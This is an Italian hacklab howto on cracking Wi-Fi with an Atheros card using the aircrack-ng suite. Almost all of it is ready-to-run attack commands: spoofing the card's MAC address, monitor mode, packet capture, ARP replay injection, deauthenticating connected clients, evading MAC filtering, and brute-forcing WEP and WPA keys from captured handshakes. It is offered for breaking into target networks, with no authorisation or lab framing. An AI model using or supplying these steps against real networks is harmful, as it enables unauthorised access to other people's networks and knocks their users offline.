Howto crack wifi with atheros card zeld

Da Poetry Hacklab.

#zeld AT freaknet DOT org


 ____   ___  _____ _____ ______   __
|  _ \ / _ \| ____|_   _|  _ \ \ / /
| |_) | | | |  _|   | | | |_) \ V /
|  __/| |_| | |___  | | |  _ < | |
|_|    \___/|_____| |_| |_| \_\|_|                       


           _       _
 _ __ ___ (_)_ __ (_)
| '_ ` _ \| | '_ \| |
| | | | | | | | | | |
|_| |_| |_|_|_| |_|_|


 _   _  _____        _______ ___
| | | |/ _ \ \      / /_   _/ _ \
| |_| | | | \ \ /\ / /  | || | | |
|  _  | |_| |\ V  V /   | || |_| |
|_| |_|\___/  \_/\_/    |_| \___/


    __                            
 _  \ \
(_)  | |
 _   | |
(_)  | |
    /_/



############Impostare l'interfaccia in "mode monitor"
airmon-ng stop ath0
ifconfig wifi0 down
macchanger --mac=00:11:22:33:44:55 wifi0
airmon-ng start wifi0

###############Craccare una WEP
#I requisiti necessari:
-Server un client connesso all'AP
-Conoscere BISSID AP tramite kismet (shift + s , shift + b e selezionare la rete da Bucare)
-Conoscere il MAC address di un client Connesso in wifi (Nella stessa finestra aperta tramite selezione del BSSID dell'AP basta dare shift + c per avere il 
MAC address dei client connessi)


	 #Per catturare i pacchetti usare questo comando
	
	 airodump-ng --channel <CANALE_AP> --bssid <BSSID_Rete_da_crackare> --write <nome_file_da_scrivere> ath0 


#Craccare in poco tempo con un ARP injection

 *controllare se il mac filtering e' attivo con questo comando:
aireplay-ng -1 0 -e <target_essid> -a <BISSID_RETE_DA_CRACCKARE> -h MY:MA:CA:DD:RE:SS <interface>

Se risponde che riesce ad allinearsi allora continuare con questo altrimeti vai sotto nella sezione MAC FILTERING abilitato

aireplay-ng -3 -b <AP MAC Address> -h <MAC Address Vittima>  INTERFACCIA

	#Deautenticare il client un attimo per far partire richieste ARP
	aireplay-ng -0 5 -a <Maccaddress AP> -c <Mac Addres_Client_connesso> INTERFACCIA << Serve per deautenticare il client_connesso


	#Oppure invece dell' ARP injection usare un 
	#Interactive Packet Replay al posto del pachet injection classico, questa e' un'altra tecnica
	#pero' non e' efficace come l'ARP injection

	aireplay-ng -2 -b <AP MAC> -h <Client MAC> -n 100 -p 0841 -c <MAC Address interfaccia attaccante>  ath0

	

#MAC FILTERING ABILITATO  

 	#Deauthentication:
 aireplay-ng -0 5 -a <BSSID_RETE_DA_CRACCKARE> -c 00:00:00:00:00:00 <interface>
	
	#Re-injection

 aireplay-ng -3 -b <BSSID_RETE_DA_CRACCKARE> -h 00:00:00:00:00:00 <interface>
#Usare in aircrack l'opzione -m <MAC ADDRESS CLIENT> per filtrare i pacchetti
	

	# Vedi come Decriptare tutti i pacchetti catturati con aircrack nella sezione in fondo al documento
	


##############Craccare la WPA: l'unico attacco: deautentication.
	#L'occorrente
		* Mac Address del pc Attaccante
		* Mac Address del client connesso all' AP
		* Mac Address(BSSID) dell' AP
		* ESSID dell'AP
		* Canale dell'AP
		* Interfaccia attaccante

	#Portare l'interfaccia in "Mode Monitor" come fatto in precedenza ma con una variante
	
	airmon-ng stop ath0
	maccanger --mac=00:11:22:33:44:55 wifi0
	airmon-ng start wifi0 N   Dove N= Canale access point

	#Lanciare Airodump in maniera da catturare i pacchetti Handshake
	

	airodump-ng -c <CANALE AP> --bssid <BSSID AP> -w <NOMEFILE> ath0

	N.B.: Non bisogna usare l'opzione --ivs 


	#Tramite airodump e' possibile vedere se vi sono client connessi, e vedremo sotto 
	BSSID              STATION            PWR  Lost  Packets  Probes 
	<MAC AP>	   <MAC CLIENT>    etc....

	tutti i client connessi..


	#A questo punto scegliere tra tutti un client e deautenticarlo con questo comando:

	aireplay-ng -0 1 -a <BSSID AP> -c <MAC CLIENT> ath0
		opp.
	aireplay-ng -0 5 -a <BSSID AP> -c <MAC CLIENT> ath0

	#A questo punto usare un bruteforce per trovare la chiave dagli handshake
	
	aircrack-ng -a 2 -b <BSSID AP> -w /path/to/wordlist  *.cap


	#Se questo comando ci risponde

	 No valid WPA handshakes found.

	#Allora aspettare in ascolto che un client si autentichi o deautenticare il client aspettando che si riautentichi



#######Decriptare i pacchetti Catturati 
# aspettiamo 200.000 pacchetti per una chiave WEP 64bit, 500.000 per una WEP 128bit e 1.000.000/2.000.000 e oltre per una  WEP 256bit 
	aircrack-ng <file_name>.cap

# Con l'opzione -a intendiamo il tipo di attacco:
  -a 1 e' un attacco da usare con la wep
  -a 2 e' un attacco da usare con la WPA-PSK

#In piu' possiamo specificare il fattore di bruteforce con -f  e di default e'  2

	
	##Bruteforce
	aircrack-ng -a 2 -b <BSSID AP> -w /path/to/wordlist  *.cap


	    		* -a 1 : forces a WEP attack mode (2 forces WPA)
	        	* either -b for the bssid or -e for the essid : whichever is easier to type but I like using a BSSID because its more unique.
			* -n 64 or -n 128 : WEP key length, omit if not known by now. 

		    So our command will look like:

		     aircrack-ng -a 1 -b <BSSID_RETE_DA_CRACKARE> -n 128 NOME_FILE.ivs

		     #N.B.: Se si e' fatto un attacco di tipo Packet Injection e si sono catturati sia pacchetti che ivs allora si puo' usare l'attacco PWT con l'opzione -z
		      aircrack-ng -a 1 -z -b <BSSID_RETE_DA_CRACKARE> -n 128 *    con * intendiamo tutti i pacchetti catturati

#Per velocizzare il cracking della chiave si puo supporre una chiave a 64 bit (-n 64) e se non si ottengono risultati si puo supporre una chiave a 128 bit (-n 128) 
#via via poi a 256 bit (-n 256)
Strumenti personali